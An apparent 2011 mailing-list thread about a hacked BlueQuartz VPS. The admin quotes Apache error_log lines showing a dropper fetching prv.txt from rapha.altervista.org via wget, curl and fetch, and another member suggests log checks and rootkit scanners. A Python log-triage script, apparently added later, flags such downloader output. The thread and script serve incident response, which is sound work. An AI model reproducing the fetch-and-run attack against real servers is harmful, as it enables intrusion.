I have looked in secure, used last. Nothing. No siteadmin logins.
Looks like they found a hole in some site. I have no idea.

-----Original Message-----
From: [email protected] [mailto:[email protected]] On Behalf Of Mike's List
Sent: Thursday, 13 October 2011 15:29
To: BlueOnyx General Mailing List
Subject: [BlueOnyx:08818] Re: vps hacked

Have you looked at /var/log/secure?
Use the "last" command to see if there was any suspicious login via shell? (Might have to unzip those wtmp file/s for older/previous logins.)
Is there a log for GUI login also that you can track?
Run rkhunter and chkrootkit for rootkit installation?
Install ClamAV, Sophos, etc. for malware/antivirus scanning?

RPMs for rkhunter and chkrootkit can be found below; download the appropriate version for your OS version, then "rpm -ivh <package.rpm>" and run "rkhunter -c" and/or "chkrootkit" to start scanning.

http://pkgs.repoforge.org/rkhunter/
http://pkgs.repoforge.org/chkrootkit/

Mike

On Thu, 13 Oct 2011, Steffan wrote:

> I still have a client with a BlueQuartz server (vps).
>
> This morning the virtual server was hacked.
> I looked in the logs and found this in /var/log/httpd/error_log:
>
> [Wed Oct 12 00:07:13 2011] [error] [client 220.181.125.72] no acceptable variant: /usr/sausalito/ui/web/error/fileNotFound.html
> --00:07:40-- http://rapha.altervista.org/prv.txt
> => `prv.txt'
> Resolving rapha.altervista.org... 46.4.65.68
> Connecting to rapha.altervista.org|46.4.65.68|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 28,039 (27K) [text/plain]
>
> 0K .......... .......... ....... 100% 1015.53 KB/s
>
> 00:07:40 (1015.53 KB/s) - `prv.txt' saved [28039/28039]
>
> sh: line 1: lwp-downlod: command not found
> sh: line 1: fetch: command not found
> sh: line 2: rapha.altervista.org/prv.txt: No such file or directory
> % Total % Received % Xferd Average Speed Time Time Time Current
> Dload Upload Total Spent Left Speed
> ^M 14 28039 14 4097 0 0 98324 0 --:--:-- --:--:-- --:--:-- 98324^M100 28039 100 28039 0 0 403k 0 --:--:-- --:--:-- --:--:-- 899k
> sh: line 3: prv.txt: command not found
> --00:07:40-- http://rapha.altervista.org/prv.txt
> => `prv.txt'
> Resolving rapha.altervista.org... 46.4.65.68
> Connecting to rapha.altervista.org|46.4.65.68|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 28,039 (27K) [text/plain]
>
> 0K .......... .......... ....... 100% 1020.34 KB/s
>
> 00:07:40 (1020.34 KB/s) - `prv.txt' saved [28039/28039]
>
> sh: line 1: lwp-downlod: command not found
> sh: line 1: fetch: command not found
> sh: line 2: rapha.altervista.org/prv.txt: No such file or directory
> % Total % Received % Xferd Average Speed Time Time Time Current
> Dload Upload Total Spent Left Speed
> ^M 4 28039 4 1201 0 0 42493 0 --:--:-- --:--:-- --:--:-- 42493^M100 28039 100 28039 0 0 507k 0 --:--:-- --:--:-- --:--:-- 1048k
> sh: line 3: prv.txt: command not found
>
> I don't see any admin logins.
> How can I find out what happened?
> I don't see anything weird in the access log or message log.
>
> Thanks,
> Steffan

_______________________________________________
Blueonyx mailing list
[email protected]
http://mail.blueonyx.it/mailman/listinfo/blueonyx
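One way to triage an error_log like the one Steffan quoted (an added example written for this page, not code from the thread, from Mike, or from BlueOnyx): every line that is not in Apache's own "[date] [level] [client ip]" format was written by a process the web server spawned, so those lines are flagged and attributed to the preceding [client ip] entry for a pivot into access_log. The regexes, the Finding class and SAMPLE (constructed from the quoted excerpt, trimmed to one download attempt) are all assumptions of this hypothetical script.

```python
import re
from dataclasses import dataclass

# Real Apache entries look like "[date] [level] [client ip] msg". Anything else in
# error_log came from a process httpd spawned (it inherits httpd's stderr).
APACHE_ENTRY = re.compile(r'^\[(?P<ts>[^\]]+)\] \[\w+\] \[client (?P<ip>[^\]]+)\] .*$')
SHELL_ERR = re.compile(r'^sh: line \d+: (?P<cmd>[^:]+): (?:command not found|No such file)')
WGET_START = re.compile(r'^--[\d:]+--\s+(?P<url>https?://\S+)')
CURL_METER = re.compile(r'^\s*%\s+Total\s+%\s+Received')

@dataclass
class Finding:
    ts: str      # timestamp of the last real Apache entry before this line
    client: str  # client IP from that entry (best-effort attribution)
    kind: str    # "download", "shell-error" or "curl"
    detail: str

def scan_error_log(lines):
    """Flag downloader/shell output in httpd error_log lines and attribute each
    hit to the most recent [client ip] entry seen before it."""
    findings, ts, client = [], "?", "?"
    for raw in lines:
        line = raw.rstrip("\n").replace("\r", "")   # drop the ^M curl emits
        if m := APACHE_ENTRY.match(line):
            ts, client = m.group("ts"), m.group("ip")
        elif m := WGET_START.match(line):
            findings.append(Finding(ts, client, "download", m.group("url")))
        elif m := SHELL_ERR.match(line):
            findings.append(Finding(ts, client, "shell-error", m.group("cmd")))
        elif CURL_METER.match(line):
            findings.append(Finding(ts, client, "curl", "progress meter"))
    return findings

def summarize(findings):
    """Values to pivot on: URLs fetched, client IPs to grep for in access_log, and
    the names the shell failed on (the dropper's wget/lwp-download/fetch/curl chain)."""
    return {"urls": sorted({f.detail for f in findings if f.kind == "download"}),
            "clients": sorted({f.client for f in findings}),
            "shell_errors": sorted({f.detail for f in findings if f.kind == "shell-error"})}

# Constructed sample: Steffan's excerpt, trimmed to one download attempt.
SAMPLE = """\
[Wed Oct 12 00:07:13 2011] [error] [client 220.181.125.72] no acceptable variant: /usr/sausalito/ui/web/error/fileNotFound.html
--00:07:40-- http://rapha.altervista.org/prv.txt
sh: line 1: lwp-downlod: command not found
sh: line 1: fetch: command not found
sh: line 2: rapha.altervista.org/prv.txt: No such file or directory
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
sh: line 3: prv.txt: command not found
""".splitlines()
```

The attribution is only a heuristic: the [client ip] entry that precedes the noise is the best candidate for the request that spawned the shell, so confirm it against access_log for the same timestamp before acting on it.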
